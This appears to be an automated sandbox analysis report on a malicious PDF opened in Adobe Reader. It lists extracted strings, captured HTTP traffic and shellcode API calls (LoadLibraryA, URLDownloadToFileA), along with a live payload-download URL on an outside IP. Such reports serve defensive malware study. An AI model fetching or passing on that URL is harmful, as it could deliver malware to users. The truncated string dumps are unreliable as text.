http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/sitefooter/icon_omnitureAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/sitefooter/icon_photoshoAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/siteheader/icon_search_mAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/siteheader/info.pAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/siteheader/logo.pAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/siteheader/search.pAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/siteheader/sh_divider.pAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/star.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/adobe/screen/wcms.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/lib/prototype.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/lib/sifr3-r419/flash/myriad-semi-boldAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/lib/sifr3-r419/js/source/sifr.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/lib/style-nurse.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/lib/swfobject.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/lib/swfobject.addon.AcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/product.cs4/screen.css?whiAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/product.cs4/screen/gfooter_override.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/product.cs4/screen/gnav_override.cAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/product.cs4/screen/no-pocket.css?whiAcroRd32.exe
http://wwwimages.adobe.com/www.adobe.com/ubi/template/identity/product.cs4/xnav/noscript.cAcroRd32.exe
https://apis.google.com/js/plusone.AcroRd32.exe
https://googleads.g.doubleclick.net/pagead/drt/si?p=caa&ut=afakxlqaaaaattfuxi4tmhrc-kjskin8shs2ap-vnAcroRd32.exe
https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xmlAcroRd32.exe
https://idisk.mac.coAcroRd32.exe
https://plus.google.com/_/apps-static/_/js/widget/gcm_ppbAcroRd32.exe
https://plus.google.com/_/apps-static/_/js/widget/googleapis_clientAcroRd32.exe
https://plusone.google.com/_/apps-static/_/js/plusone/p1bAcroRd32.exe
https://plusone.google.com/_/apps-static/_/ss/plusone/ver=27trch45rjpg/am=AcroRd32.exe
https://ssl.gstatic.com/s2/oz/images/stars/po/publisher/sprite.pAcroRd32.exe
https://www.adobeereg.com/https://www.winsoft.fr/registration/registration1.jsp?pageid=regmp1adobeAcroRd32.exe
https://www.verisign.com/rpAcroRd32.exe
https://www.verisign.com/rpaAcroRd32.exe
Bank names
String valueSource
In streams that use &LZW encoding, use Flate insteadRemove invalid book&marksRemove invalid lin&ksRemove unreferenced &named destinationsOptimize the PDF for fast web v&iewDiscard Objects SettingsDiscard all &form submission, import and reset actionsF&latten form fieldsDiscard all &JavaScript actionsDiscard all e&xternal cross referencesDiscard all alternate ima&gesDiscard do&cument tagsDiscard embedded page &thumbnailsDiscard p&rivate data of other applicationsDiscard &hidden layer content and flatten visible layersDetect an&d merge image fragmentsCon&vert smooth lines to curvesDiscard embedded pri&nt settingsDiscard boo&kmarksDiscard embedded search &indexDiscard user related informationDiscard all co&mments, forms and multimediaDiscard document &information and metadataDiscard all &object dataDiscard &file attachmentsDiscard e&xternal cross referencesDiscard &hidden layer content and flatten visible layersDiscard p&rivate data of other applicationsTransparency SettingsFlattens transparent regions in the pageConversion WarningsAdd Header and Footer&Saved Settings:Sa&ve Settings...Save current settings as:&Delete&Left:&Right:&Top:&Bottom:&Page Number Format:&Date Format:Left Header TextCenter Header TextRight Header TextLeft Footer TextCenter Footer TextRight Footer Text&All Pages&Pages from:Save SettingsLine Separator:Line Width: Pa&ge Range Options...Page Range OptionsPage Nu&mber and Date Format...Page Number and Date FormatAppearance Options&Appearance Options...Text Background Color:&InsertIns&ertRe&moveIns&ert Date&Insert Page Number&PreviewPage &Range&Subset:All Pagesfrom:t&o:FontFo&ntSi&ze:&Align:Na&me:St&yle:Mar&gins (inches)Te&xt:S&tart Page Number:Repla&ce existing headers and footers on these pages&Shrink document to avoid overwriting the document's text and graphics&Keep position and size of header/footer text constant when printing on different page sizesBIUCPreviewPrevie&w Pageof %nBates Numbering Options&Number of Digits:&Start Number:&Prefix:&Suffix:Create LinkCreate Link from SelectionLink equals www.regions.com (Regions Bank)AcroRd32.exe
n; higher resolution will yield higher quality but increase processing time. Size of saved files or print spool files may be large.Maintains simpler vector objects, but rasterizes more complex areas involving transparency. Ideal for artwork with only a few transparent objects. Some printers may yield rough transitions between bordering vector and raster objects and make hairlines appear thicker. Appropriate for low-memory systems.Maintains most objects as vector data, but rasterizes very complex transparent regions. Generally the best setting for printing and exporting most pages. With some printers, improves transition issues between bordering vector and raster objects.Maintains most of the page content as vectors, rasterizing only extremely complex areas. Produces high quality output that is generally resolution-independent. Higher occurrences of transparent regions will increase processing time. With some printers improves transition issues between bordering vector and raster objects.The entire page is printed or exported as vector data, to the greatest extent possible. This produces the highest quality resolution-independent output. Processing of complex pages may be very time and memory intensiveSelect an ICC Profile that describes the target output device. If 'Printer/PostScript Color Management' is selected, convert any ICC profiles to PostScript CSAs, and color will be managed in the printer RIP. If 'Same as Source (No Color Management)' is selected, embedded profiles are ignored, and only device values are sent.Emit this plate by converting it to one or more process colors.Emit this plateDon't emit this plateDouble-click on the plate entry to launch the Ink Manager.HorizontalVerticalHorizontal and VerticalPreparing Printing Flattening Multiple FilesCompositeAs ImageSimplexDuplex Flip Long EdgeDuplex Flip Short EdgeThe current setup requires a printer capable of printing both sides. The selected printer may not support it. Do you still want to continue printing?PreserveConvertConvert to AlternateMap to equals www.regions.com (Regions Bank)AcroRd32.exe
Social media names
String valueSource
Don't show againSave a Blank Copy of this FormData typed into this form will not be saved. Adobe Reader can only save a blank copy of this form.Save a Blank CopyPlease print your completed form if you would like a copy for your records.The document you are saving is a blank copy of your form. This blank copy does not contain any information you may have typed into the form.CancelOKContinueEmail a Blank Copy of this FormThe email method you just chose will email a blank copy of this form. The blank copy will not contain any data you may have typed into this form.Email a Blank CopyThis form contains an email submit button, located on the form. Clicking this email submit button will email a data file containing data you type into this form.blankcopySelect Email ClientPlease indicate the option which best describes how you send mail.Desktop Email ApplicationChoose this option if you currently use an email application such as Microsoft Outlook Express, Microsoft Outlook, Eudora, or Mail.Internet EmailChoose this option if you currently use an Internet email service such as Yahoo or Microsoft Hotmail.OtherChoose this option if your preferred desktop email application is not available or you do not know which option to choose.PrintHelpNon-interactive for commentingSave for commentingSave a non-interactive copy of the form for commentin equals www.hotmail.com (Hotmail)AcroRd32.exe
Don't show againSave a Blank Copy of this FormData typed into this form will not be saved. Adobe Reader can only save a blank copy of this form.Save a Blank CopyPlease print your completed form if you would like a copy for your records.The document you are saving is a blank copy of your form. This blank copy does not contain any information you may have typed into the form.CancelOKContinueEmail a Blank Copy of this FormThe email method you just chose will email a blank copy of this form. The blank copy will not contain any data you may have typed into this form.Email a Blank CopyThis form contains an email submit button, located on the form. Clicking this email submit button will email a data file containing data you type into this form.blankcopySelect Email ClientPlease indicate the option which best describes how you send mail.Desktop Email ApplicationChoose this option if you currently use an email application such as Microsoft Outlook Express, Microsoft Outlook, Eudora, or Mail.Internet EmailChoose this option if you currently use an Internet email service such as Yahoo or Microsoft Hotmail.OtherChoose this option if your preferred desktop email application is not available or you do not know which option to choose.PrintHelpNon-interactive for commentingSave for commentingSave a non-interactive copy of the form for commentin equals www.yahoo.com (Yahoo)AcroRd32.exe
http://cdn.api.twitter.com/1/urls/count.json?url=http%3A%2F%2Fwww.oldapps.com%2F&callback=twttr.receiveCou equals www.twitter.com (Twitter)AcroRd32.exe
http://connect.facebook.net/en_US/all. equals www.facebook.com (Facebook)AcroRd32.exe
http://platform.twitter.com/js/xd/jsonrpc. equals www.twitter.com (Twitter)AcroRd32.exe
http://platform.twitter.com/js/xd/parent. equals www.twitter.com (Twitter)AcroRd32.exe
http://platform.twitter.com/widgets. equals www.twitter.com (Twitter)AcroRd32.exe
http://platform.twitter.com/widgets/hub.ht equals www.twitter.com (Twitter)AcroRd32.exe
http://platform.twitter.com/widgets/images/tweet.dfbf1dd98bad9f5b5addd80494650dca.p equals www.twitter.com (Twitter)AcroRd32.exe
http://platform.twitter.com/widgets/tweet_button.ht equals www.twitter.com (Twitter)AcroRd32.exe
VM Artifacts
String valueSource
\??\C:\WINDOWS\system32\VBoxService.eAcroRd32.exe
\??\C:\WINDOWS\system32\VBoxTray.eAcroRd32.exe
alDisksavCurrDocRadioavSelectedDocsRadioavEntirePackageRadioavCurrDocProgressLabelavSelectedDocsProgressLabelavEntirePackageProgressLabelavHardDriveRadioavIndexRadioavSearchPushButtonavSearchCommentsPushButtonavSearchAttachmentsPushButtonavSearchSpecifiedAttachmentsPushButtonavSearchAndRedactPushButtonavSearchingForavLookingForavSearchingInavLookingInavSearchBrowseCaptionavDoneSearchavNewBasicSearchavSearchResultsavSearchFIXMEavSearchSearchingavSearchSearchingPageavSearchFinishedavSearchFinishedLookingavSearchFinishedInavSearchFinishedLookingInavSearchSearchTermAndLocationavSearchHitsAndDocumentsavSearchDocsavSearchInstancesavSearchElipsesavSearchCollapseFilePathsavSearchReturnResultsavSearchLookInavSearchAdditionalCriteriaavSearchOnInternetavSearchOnInternetVenderNameavSearchAdvancedavSearchRefineavNewSearchavSearchAcrossavSearchUseBasicavSearchBeginNewavSearchCurrentPDFDocumentsavSearchEditIndexOfPDFDocumentsavSearchIndexOfPDFDocumentsavSearchMatchWholeWordsavSearchCaseSensitiveavSearchBookmarksavSearchCommentsavSearchAttachmentsavHowPreciseavSearchTheInternetavRefineSearchWhatavSortByavRelevanceRankingavDateModifiedavFilenameavLocationavSortNoneavProximityavStemmingavSearchNoteavSearchSearchAcrossavSearchDependingavSearchOnlyPDFsavSearchExactWordavSearchAllWordsavSearchAnyWordsavSearchBooleanQueryavMCNoneSelectedavMCCreationDateavMCModificationDateavMCAuthoravMCTitleavMCSubjectavMCFileNameavMCKeywordsavMCCommentsavMCBookmarksavMCImagesavMCDocXMPavMCObjectDataavMCAttachmentsavCOEqualsavCOContainsavCONotEqualavCOLessThanavCOGreaterThanavCOIsNotavSearchArrangeWindowsavSearchArrangeWindowsToolTipavSearchArrangeWindowLeftavSearchArrangeWindowRightavSearchAndRedactCandidatesavSearchAndRedactCheckAllavSearchAndRedactUncheckAllavSearchAndRedactWarningavConfirmPasteavPasteButtonavReplaceButtonavBuiltInavMacRomanavMacExpertavWindowsavStandardavCustomavType1avMMavType3avTrueTypeavType0avCIDType0avCIDType2avUnknownavEmbeddedavEmbeddedOTavSubsetavSubsetOTavTypeavEncodingavSubstituteUnknownavSubstituteavSubstituteTypeavAppleMenuavSpecialCharactersMenuItemavNewBlankDocumentavDocManSubMenuavCheckOutMenuItemavCheckInMenuItemavUndoCheckOutMenuItemavApproveMenuItemavPublishMenuItemavRejectMenuItemavApplicationRightsMenuItemavSaveACopyMenuItemavQuitReaderMenuItemavPrintBadFromavPrintBadToavPrintInvalidRangeavPrintEmptyRangeavRedactSelectedTextMenuItemavRedactUndoavRedactRedoavCopySelectedGraphicMenuItemavSelectAllTextMenuItemavDeselectAllTextMenuItemavPrintSelectionMenuItemavGetInfoImageavImageInfoavConfirmCreateImageCatalogavAGMComDocResavAGMComPageResavAGMStmDocFontavAGMStmDocResavAGMDLCSAavAGMDLCRDavAGMDLGradavAGMStmImageavAGMStmOPIavAGMPRSepavAGMDLSepavAGMStmDocPSavAGMDocEPIavAGMPageEPIavAGMPCavAGMPPIavAGMPImageProgressavEmptyPageRangeavPrintDevIndependentavPrintSettingavPrintPanelDefSettingsavPrintPanelPSavPrintPanelTransparencyavPrintPanelTransparencyAmpavPrintPanelColoravPrintPanelMarksBleedsavPrintPanelLayersavFlatPresetsMenuItemavGeneralPrefsMenuItemHelpavFixedZoomMenuItemavFullScreenMenuItemWindowMenuavProofSetupMenuavProofCustomMenuItemavProofInkBlackMenuItemavProofPaperWhiteMenuItemavProofColorsMenuItemavOverprintPreviewMenuItemavPDFAPolicySubMenuavPDFAPolicyNeveravPDFAPolicyAlwaysavPDFAPolicyWhenCompliantavOpenLinkInNewWindowavFunctionKeyPaletteMenuItemavAdvancedMenuavPrintProductionSubMenuavDocumentProcessingSubMenuavLookUpDefinitionMenuItemavLookUpWordMenuItem2avTileMonitorsMenuItemavCantLoadResourceavServicesMenuItemavHideAcrobatMenuItemavHideReaderMenuItemavHideOthersMenuItemavShowAllMenuItemavMinimizeMenuItemavMinimizeAllMenuItemavZoomWindowMenuItemavBringAllToFrontMenuItemavReadingSplitavSpreadsheetSplitavRemoveSplitavHideThisButtonavShowToolbarsMenuItemHelpavHideToolbarsMenuItemavHideToolbarsMenuItemHelpavHideToolbarsWarningavShowHideToolbarButtonTipavZoomToolsContextMenuavPropertyToolbarMenuItemHelpavPropertyBarDefaultLabelavTaskButtonsSubMenuavTasksHomeTitleavTasksCreatePDFTitleavTasksCombineFilesTitleavTasksSearchTitleavTasksEngineeringTitleavTasksOutputTitleavTasksExportTitleavShowHowToMenuItemavHideHowToMenuItAcroRd32.exe

Network Behavior

TCP Packets
TimestampSource PortDest PortSource IPDest IP
Nov 16, 2012 15:15:26.984139919 CET109980192.168.0.1379.137.237.66
Nov 16, 2012 15:15:26.984169006 CET80109979.137.237.66192.168.0.13
Nov 16, 2012 15:15:26.984507084 CET109980192.168.0.1379.137.237.66
Nov 16, 2012 15:15:27.254940033 CET109980192.168.0.1379.137.237.66
Nov 16, 2012 15:15:27.254960060 CET80109979.137.237.66192.168.0.13
Nov 16, 2012 15:15:34.934161901 CET80109979.137.237.66192.168.0.13
Nov 16, 2012 15:15:34.934714079 CET109980192.168.0.1379.137.237.66
Nov 16, 2012 15:15:35.196383953 CET109980192.168.0.1379.137.237.66
Nov 16, 2012 15:15:35.196402073 CET80109979.137.237.66192.168.0.13
HTTP Request Dependency Graph
  • 79.137.237.66
HTTP Packets
TimestampSource PortDest PortSource IPDest IPHeaderTotal Bytes Transfered (KB)
Nov 16, 2012 15:15:27.254940033 CET109980192.168.0.1379.137.237.66GET /a.php?f=21&e=4 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 79.137.237.66
Connection: Keep-Alive
0

Code Manipulation Behavior

System Behavior

General
Start time:10:12:44
Start date:24/01/2012
Path:C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe
Wow64 process (32bit):false
Commandline:unknown
Imagebase:0x400000
File size:341616 bytes
MD5 hash:80660C611B596FFE8AF4074B31AA6FB7

Disassembly

Shellcode Analysis

APIs
  • LoadLibraryA.KERNEL32, ref: 02F900D2
  • URLDownloadToFileA.URLMON, ref: 02F90139
  • TerminateThread.KERNEL32, ref: 02F90166
AddressValue
2f90186http://79.137.237.66/a.php?f=21&e=4

Code Analysis